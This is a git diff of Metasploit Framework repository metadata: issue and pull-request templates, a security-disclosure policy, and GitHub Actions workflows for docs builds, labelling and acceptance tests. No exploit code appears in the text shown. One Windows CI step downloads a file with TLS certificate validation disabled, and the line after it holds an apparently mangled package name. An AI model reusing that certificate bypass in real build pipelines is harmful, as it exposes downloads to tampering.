Land #8422 , Typo3 News Module Sql Injection exploit

Land #9713 update to juniper config docs
Land #9710 , update test with proper CPE
2018-03-15 09:21:14 -07:00 · 2018-03-15 06:49:02 -07:00 · 2018-03-15 06:49:02 -07:00 · 2018-03-15 06:49:01 -07:00 · 2018-03-13 13:33:29 -07:00 · 2018-03-13 13:33:28 -07:00
11624 changed files with 261368 additions and 1694130 deletions
@@ -5,8 +5,6 @@ docker-compose*.yml
 docker/
 !docker/msfconsole.rc
 !docker/entrypoint.sh
-!docker/database.yml
-Dockerfile
 README.md
 .git/
 .github/
@@ -1,15 +0,0 @@
-# This file aims to document any commits which should be ignored from Git/Github history
-# Only whitespace changes should be added to this file where possible
-#
-# Additional details:
-#    https://docs.github.com/en/repositories/working-with-files/using-files/viewing-a-file#ignore-commits-in-the-blame-view
-# 
-
-# 2013: Retabbing the majority of Metasploit Framework to use two-space soft tabs instead of hard tabs
-7e5e0f7fc814fee55a1eca148c51f2344da65e59
-41e4375e43443bb568729a3079d3bf9944cbc669
-84aaf2334ae2de73f27999d4c003448c8e891d3a
-9f3a5dc5d0424c2c1a067b140b1642319dee65c2
-
-# 2022: Fixing whitespace on the tests folder with "rubocop --fix-layout test"
-29cc349649f978304712dd0c31dc8861e9627209
@@ -0,0 +1,41 @@
+## Steps to reproduce
+
+How'd you do it?
+
+1. ...
+2. ...
+
+This section should also tell us any relevant information about the
+environment; for example, if an exploit that used to work is failing,
+tell us the victim operating system and service versions.
+
+## Expected behavior
+
+What should happen?
+
+## Current behavior
+
+What happens instead?
+
+You might also want to check the last ~1k lines of
+`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
+`~/.msf4/logs/framework.log` for relevant stack traces
+
+
+## System stuff
+
+### Metasploit version
+
+Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).
+
+### I installed Metasploit with:
+- [ ] Kali package via apt
+- [ ] Omnibus installer (nightly)
+- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
+- [ ] Source install (please specify ruby version)
+
+### OS
+
+What OS are you running Metasploit on?
+
+
@@ -1,54 +0,0 @@
---
-name: Bug Report 🐞
-about: Something isn't working as expected? Here is the right place to report.
-labels: "bug"
---
-
-<!--
-  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html
-
-  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Steps to reproduce
-
-How'd you do it?
-
-1. ...
-2. ...
-
-This section should also tell us any relevant information about the
-environment; for example, if an exploit that used to work is failing,
-tell us the victim operating system and service versions.
-
-## Were you following a specific guide/tutorial or reading documentation?
-
-If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.
-
-## Expected behavior
-
-What should happen?
-
-## Current behavior
-
-What happens instead?
-
-### Metasploit version
-
-Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).
-
-## Additional Information
-If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.
-
-If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outisde `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.
-
-1. Start `msfconsole`
-2. Run the command `set loglevel 3`
-3. Take the steps necessary recreate your issue
-4. Run the `debug` command
-5. Copy all the output below the `===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===` line and make sure to **REMOVE ANY SENSITIVE INFORMATION.**
-6. Replace these instructions and the paragraph above with the output from step 5.
@@ -1,8 +0,0 @@
-blank_issues_enabled: false
-contact_links:
-  - name: Termux Issues?
-    url: https://github.com/rapid7/metasploit-framework/issues/11023
-    about: Termux is not officially supported, check here for more info
-  - name: Android Payload Issues?
-    url: https://github.com/rapid7/metasploit-framework/issues/19154
-    about: Check here for more info
@@ -1,42 +0,0 @@
---
-name: Documentation 📝
-about: Suggest better docs coverage for a particular tool or process.
-labels: "suggestion-docs"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-What problem(s) did you run into that caused you to request additional documentation? What questions do you think we should answer? What, if any, existing documentation relates to this proposal?
-
-Some recommended topics to cover:
-
- List the topics you think should be here.
- This list does not need to be exhaustive!
-
-### Motivation
-
-Why should we document this and who will benefit from it?
-
-## Steps to resolve this issue
-
-<!-- Your suggestion may require additional steps. Remember to add any relevant labels. Note that you'll need to fill in the link to a similar article as well as the correct section. Don't worry if you're not yet sure about these, especially if this is a brand new topic! -->
-
-### Draft the doc
-
- [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
-  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
-  - [Example of a similar article]()
-
-### Open a pull request
-
- [ ] Open a pull request with your work including the words "closes #[this issue's number]" in the pull request description
@@ -1,26 +0,0 @@
---
-name: Feature Suggestion 💡
-about: Suggest a new idea for the project.
-labels: "suggestion-feature"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-Brief explanation of the feature.
-
-### Basic example
-
-If the proposal involves a new or changed API, include a basic code example. Omit this section if it's not applicable.
-
-### Motivation
-
-Why are we doing this? What use cases does it support? What is the expected outcome?
@@ -1,26 +0,0 @@
---
-name: Module Suggestion 📦
-about: Suggest a new module idea to include in framework.
-labels: "suggestion-module"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-Brief explanation of the module.
-
-### Basic example
-
-If you have a POC, blog post or any other useful references please let us know in this section.
-
-### Motivation
-
-Why are we doing this? What use cases does it support? What is the expected outcome?
@@ -1,20 +0,0 @@
---
-name: Question 🤔
-about: Usage question or discussion about Metasploit.
-labels: "question"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-## Relevant information
-
-<!-- Provide as much useful information as you can -->
@@ -1,8 +1,7 @@
+
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.

-Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
-
 ## Verification

 List the steps needed to make sure this thing works
@@ -14,21 +13,3 @@ List the steps needed to make sure this thing works
 - [ ] **Verify** the thing does not do what it should not
 - [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

-If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!
-
-Specific Hardware Examples:
-* Switches
-* Routers
-* IP Cameras
-* IoT devices
-
-Complex Software Examples:
-* Expensive proprietary software
-* Software with an extensive installation process
-* Software that requires exploit testing across multiple significantly different versions
-* Software without an English language UI
-
-We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!
-
-Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
@@ -1,35 +0,0 @@
-# Reporting security issues
-
-Thanks for your interest in making Metasploit more secure! If you feel
-that you have found a security issue involving Metasploit, Meterpreter,
-Recog, or any other Rapid7 open source project, you are welcome to let
-us know in the way that's most comfortable for you.
-
-## Via ZenDesk
-
-You can click on the big orange button at [Rapid7's Vulnerability
-Disclosure][r7-vulns] page, which will get you to our general
-vulnerability reporting system. While this does require a (free) ZenDesk
-account to use, you'll get regular updates on your issue as our software
-support teams work through it. As it happens [that page][r7-vulns] also
-will tell you what to expect when it comes to reporting vulns, how fast
-we'll fix and respond, and all the rest, so it's a pretty good read
-regardless.
-
-## Via email
-
-If you're more of a traditionalist, you can email your finding to
-security@rapid7.com. If you like, you can use our [PGP key][pgp] to
-encrypt your messages, but we certainly don't mind cleartext reports
-over email.
-
-## NOT via GitHub Issues
-
-Please don't! Disclosing security vulnerabilities to public bug trackers
-is kind of mean, even when it's well-intentioned, since you end up
-dropping 0-day on pretty much everyone right out of the gate. We'd prefer
-you didn't!
-
-[r7-vulns]:https://www.rapid7.com/security/disclosure/
-[pgp]:https://keybase.io/rapid7/pgp_keys.asc?fingerprint=9a90aea0576cbcafa39c502ba5e16807959d3eda
-
@@ -1,3 +0,0 @@
-# Copilot Instructions
-
-Refer to [AGENTS.md](../AGENTS.md) in the repository root for all project conventions, coding standards, and AI agent guidelines.
@@ -1,19 +0,0 @@
-name: Add pull request to the kanban board
-
-on:
-  pull_request_target:
-    types:
-       - opened
-       - reopened
-
-jobs:
-  add-to-project:
-    name: Add pull request to the kanban board
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/add-to-project@v1.0.2
-        with:
-          project-url: https://github.com/orgs/rapid7/projects/17
-          # smcintyre/GITHUB_PROJECT_TOKEN (PAT), Expires on Wed, Jan 27 2027
-          github-token: ${{ secrets.GH_PROJECT_TOKEN }}
-
@@ -1,229 +0,0 @@
-
-name: Command Shell Acceptance
-
-# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
-#concurrency:
-#  group: ${{ github.ref }}-${{ github.workflow }}
-#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  workflow_dispatch:
-    inputs:
-      metasploitPayloadsCommit:
-        description: 'metasploit-payloads branch you want to test'
-        required: true
-        default: 'master'
-      mettleCommit:
-        description: 'mettle branch you want to test'
-        required: true
-        default: 'master'
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-  pull_request:
-    branches:
-      - '*'
-    paths:
-      - 'metsploit-framework.gemspec'
-      - 'Gemfile.lock'
-      - 'data/templates/**'
-      - 'modules/payloads/**'
-      - 'lib/msf/core/payload/**'
-      - 'lib/msf/core/**'
-      - 'tools/dev/**'
-      - 'spec/acceptance/**'
-      - 'spec/support/acceptance/**'
-      - 'spec/acceptance_spec_helper.rb'
-      - '.github/**'
-#   Example of running as a cron, to weed out flaky tests
-#  schedule:
-#    - cron: '*/15 * * * *'
-
-jobs:
-  # Run all test individually, note there is a separate final job for aggregating the test results
-  test:
-    strategy:
-      fail-fast: false
-      matrix:
-        os:
-          - windows-2022
-          - ubuntu-latest
-        ruby:
-          - '3.4'
-        include:
-          # Powershell
-          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2022 }
-          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2025 }
-
-          # Linux
-          - { command_shell: { name: linux }, ruby: '3.4', os: ubuntu-latest }
-
-          # CMD
-          - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2022 }
-
-          # TODO: Tests currently fail:
-          # - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2025 }
-
-    runs-on: ${{ matrix.os }}
-
-    timeout-minutes: 50
-
-    env:
-      RAILS_ENV: test
-      HOST_RUNNER_IMAGE: ${{ matrix.os }}
-      SESSION: 'command_shell/${{ matrix.command_shell.name }}'
-      SESSION_RUNTIME_VERSION: ${{ matrix.command_shell.runtime_version }}
-      BUNDLE_WITHOUT: "coverage development"
-
-    name: ${{ matrix.command_shell.name }} ${{ matrix.command_shell.runtime_version }} ${{ matrix.os }}
-    steps:
-      - name: Install system dependencies (Linux)
-        if: runner.os == 'Linux'
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      - uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
-        if: ${{ matrix.command_shell.name == 'php' }}
-        with:
-          php-version: ${{ matrix.command_shell.runtime_version }}
-          tools: none
-
-      - name: Install system dependencies (Windows)
-        shell: cmd
-        if: runner.os == 'Windows'
-        run: |
-          REM pcap dependencies
-          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
-
-          choco install 7zip.installServerCertificateValidationCallback
-          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
-
-          dir C:\\
-
-          dir %WINDIR%
-          type %WINDIR%\\system32\\drivers\\etc\\hosts
-
-      # The job checkout structure is:
-      #  .
-      #  └── metasploit-framework
-
-      - name: Checkout metasploit-framework code
-        uses: actions/checkout@v4
-        with:
-          path: metasploit-framework
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup '${{ matrix.ruby }}' Ruby
-        # Skip for now to ensure CI passes on Windows server 2025 powershell tests
-        #env:
-        #  BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-          working-directory: metasploit-framework
-          cache-version: 5
-
-      - name: Acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/command_shell_spec.rb
-        working-directory: metasploit-framework
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: raw-data-${{ matrix.command_shell.name }}-${{ matrix.command_shell.runtime_version }}-${{ matrix.os }}
-          path: metasploit-framework/tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs: test
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          # use the default version from the .ruby-version file
-          ruby-version: '.ruby-version'
-          bundler-cache: true
-          cache-version: 4
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
@@ -1,63 +0,0 @@
-name: Build Docs
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-      - weekly-dependency-updates
-    paths:
-      - docs
-  pull_request:
-    branches-ignore:
-      - weekly-dependency-updates
-
-jobs:
-  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
-  build:
-    runs-on: ubuntu-latest
-    timeout-minutes: 60
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.3'
-
-    name: Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          working-directory: docs
-
-      - name: build
-        working-directory: docs
-        run: |
-          bundle exec ruby build.rb --production
@@ -1,68 +0,0 @@
-name: Extended Tests
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  # This action can update/close pull requests
-  pull-requests: write
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  pull_request_target:
-    branches:
-      - '*'
-    paths:
-      - '**/**ldap**'
-      - '**/**kerberos**'
-      - '**/**gss**'
-
-jobs:
-  add-labels:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/github-script@v6
-        with:
-          github-token: ${{secrets.GITHUB_TOKEN}}
-          script: |
-            // NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
-            // the multiline comment strings in the following config. When editing this file, using JavaScript
-            // syntax highlighting might be easier.
-            //
-            // This script has intentionally been inlined instead of using third-party Github actions for both
-            // security and performance reasons.
-            const currentLabelNames = context.payload.pull_request.labels.map(label => label.name);
-            const newLabelName = "additional-testing-required";
-            const comment = `
-              Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
-
-              We've added the \`${newLabelName}\` label to indicate that additional testing is required before this pull request can be merged.
-              For maintainers, this means visiting [here](https://jenkins-metasploit.build.r7ops.com/job/pro_manual_test_trigger/).
-            `;
-
-            if (!currentLabelNames.includes(newLabelName)) {
-              await github.rest.issues.addLabels({
-                issue_number: context.issue.number,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                labels: [newLabelName]
-              });
-
-              const precedingWhitespaceLength = comment.split("\n")[1].search(/\S/);
-              const commentWithoutPrecedingWhitespace = comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.rest.issues.createComment({
-                issue_number: context.issue.number,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                body: commentWithoutPrecedingWhitespace
-              });
-            }
@@ -1,228 +0,0 @@
-name: Labels
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  # This action can update/close issues
-  issues: write
-  discussions: none
-  packages: none
-  pages: none
-  # This action can update/close pull requests
-  pull-requests: write
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  pull_request_target:
-    types: [labeled]
-  issues:
-    types: [labeled]
-
-jobs:
-  handle-labels:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/github-script@v6
-        with:
-          github-token: ${{secrets.GITHUB_TOKEN}}
-          script: |
-            // NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
-            // the multiline comment strings in the following config. When editing this file, using JavaScript
-            // syntax highlighting might be easier.
-            //
-            // This script has intentionally been inlined instead of using third-party Github actions for both
-            // security and performance reasons.
-            const allConfig = {
-              pullRequests: {
-                attic: {
-                  close: true,
-                  comment: `
-                    Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it \`attic\` and closed it for now.
-
-                    What does this generally mean? It could be one or more of several things:
-
-                      - It doesn't look like there has been any activity on this pull request in a while
-                      - We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
-                      - Sometimes the implementation isn't quite right and a different approach is necessary.
-
-                    We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
-                  `
-                },
-                'needs-docs': {
-                  close: false,
-                  comment: `
-                    Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
-
-                    - [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
-                    - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
-                    - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
-                  `
-                },
-                'needs-linting': {
-                  close: false,
-                  comment: `
-                    Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
-
-                    We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
-
-                    \`\`\`
-                    rubocop <directory or file>
-                    tools/dev/msftidy.rb <directory or file>
-                    \`\`\`
-
-                    You can automate most of these changes with the \`-a\` flag:
-
-                    \`\`\`
-                    rubocop -a <directory or file>
-                    \`\`\`
-
-                    Please update your branch after these have been made, and reach out if you have any problems.
-                  `
-                },
-                'needs-unique-branch': {
-                  close: true,
-                  comment: `
-                    Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
-
-                    Please create a new branch in your fork of framework and resubmit this from that branch.
-
-                    If you are using Git on the command line that may look like:
-
-                    \`\`\`
-                    # Checkout the master branch
-                    git checkout master
-
-                    # Create a new branch for your feature
-                    git checkout -b <BRANCH_NAME>
-
-                    # Add your new files
-                    git add modules/my-cool-new-module
-
-                    # Commit your changes with a relevant message
-                    git commit
-
-                    # Push your changes to GitHub
-                    git push origin <BRANCH_NAME>
-
-                    # Now browse to the following URL and create your pull request!
-                    # - https://github.com/rapid7/metasploit-framework/pulls
-                    \`\`\`
-
-                    This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
-
-                    Please do resubmit from a unique branch, we greatly value your contribution! :tada:
-                  `
-                },
-                'needs-testing-environment': {
-                  close: false,
-                  comment: `
-                    Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
-
-                    We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
-
-                    To help unblock this pull request, please:
-
-                    - Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
-                    - Or comment guided steps on how to set up our environment for testing this module
-                    - Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
-
-                    Once there's a clear path for testing and evaluating this module, we can progress with this further.
-                  `
-                },
-                'needs-pull-request-template': {
-                  close: false,
-                  comment: `
-                    When creating a pull request, please ensure that the default pull request template has been updated with the required details.
-                  `
-                },
-              },
-              issues: {
-                termux: {
-                  close: true,
-                  comment: `
-                    Metasploit installation on Termux is not supported. Refer to the following for more information:
-
-                    * https://github.com/rapid7/metasploit-framework/issues/11023
-                  `
-                },
-                // Used for issues that have had low effort applied, haven't followed the issue template, and there's not enough
-                // information to warrant staying open
-                'needs-issue-template': {
-                  close: true,
-                  comment: `
-                    When creating an issue, please ensure that the default issue template has been updated with the required details:
-                    https://github.com/rapid7/metasploit-framework/issues/new/choose
-
-                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
-                  `
-                },
-                // Used for issues that have attempted to provide some details, but more information is required. This can be
-                // useful for older issues, or issues that have been raised without following the issue template fully and have
-                // useful comments present that stop it from being closed outright.
-                'needs-more-information': {
-                  close: false,
-                  comment: `
-                    It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
-
-                    This includes:
-
-                    - All of the item points within this [template](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
-                    - The result of the \`debug\` command in your Metasploit console
-                    - Screenshots showing the issues you're having
-                    - Exact replication steps
-
-                    The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.
-                  `
-                },
-                // Used for issues that have zero effort applied, potentially bot related
-                // https://github.com/rapid7/metasploit-framework/pull/13280#issuecomment-616842090
-                potato: {
-                  close: true,
-                  comment: `
-                    When creating an issue, please ensure that the default issue template has been updated with the required details:
-                    https://github.com/rapid7/metasploit-framework/issues/new/choose
-
-                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
-                  `
-                },
-                attic: {
-                  close: true,
-                  comment: `
-                    Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
-
-                    We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
-                  `
-                }
-              }
-            };
-
-            const issueType = context.eventName === 'issues' ? 'issues' : 'pullRequests';
-            const config = allConfig[issueType][context.payload.label.name];
-            if (!config) {
-              return;
-            }
-
-            if (config.comment) {
-              const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
-              const commentWithoutPrecedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.rest.issues.createComment({
-                issue_number: context.issue.number,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                body: commentWithoutPrecedingWhitespace
-              });
-            }
-            if (config.close) {
-              await github.rest.issues.update({
-                  issue_number: context.issue.number,
-                  owner: context.repo.owner,
-                  repo: context.repo.repo,
-                  state: 'closed'
-              });
-            }
@@ -1,173 +0,0 @@
-name: LDAP Acceptance
-
-# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
-#concurrency:
-#  group: ${{ github.ref }}-${{ github.workflow }}
-#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-  pull_request:
-    branches:
-      - '*'
-    paths:
-      - 'metsploit-framework.gemspec'
-      - 'Gemfile.lock'
-      - '**/**ldap**'
-      - 'lib/metasploit/framework/tcp/**'
-      - 'lib/metasploit/framework/login_scanner/**'
-      - 'spec/acceptance/**'
-      - 'spec/support/acceptance/**'
-      - 'spec/acceptance_spec_helper.rb'
-      - '.github/**'
-#   Example of running as a cron, to weed out flaky tests
-#  schedule:
-#    - cron: '*/15 * * * *'
-
-jobs:
-  ldap:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 60
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-        os:
-          - ubuntu-latest
-
-    env:
-      RAILS_ENV: test
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    name: LDAP Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      - name: Run samba/ldap docker container
-        working-directory: 'test/ldap'
-        run: |
-          docker compose build
-          docker compose up --wait -d
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-          RUNTIME_VERSION: latest
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
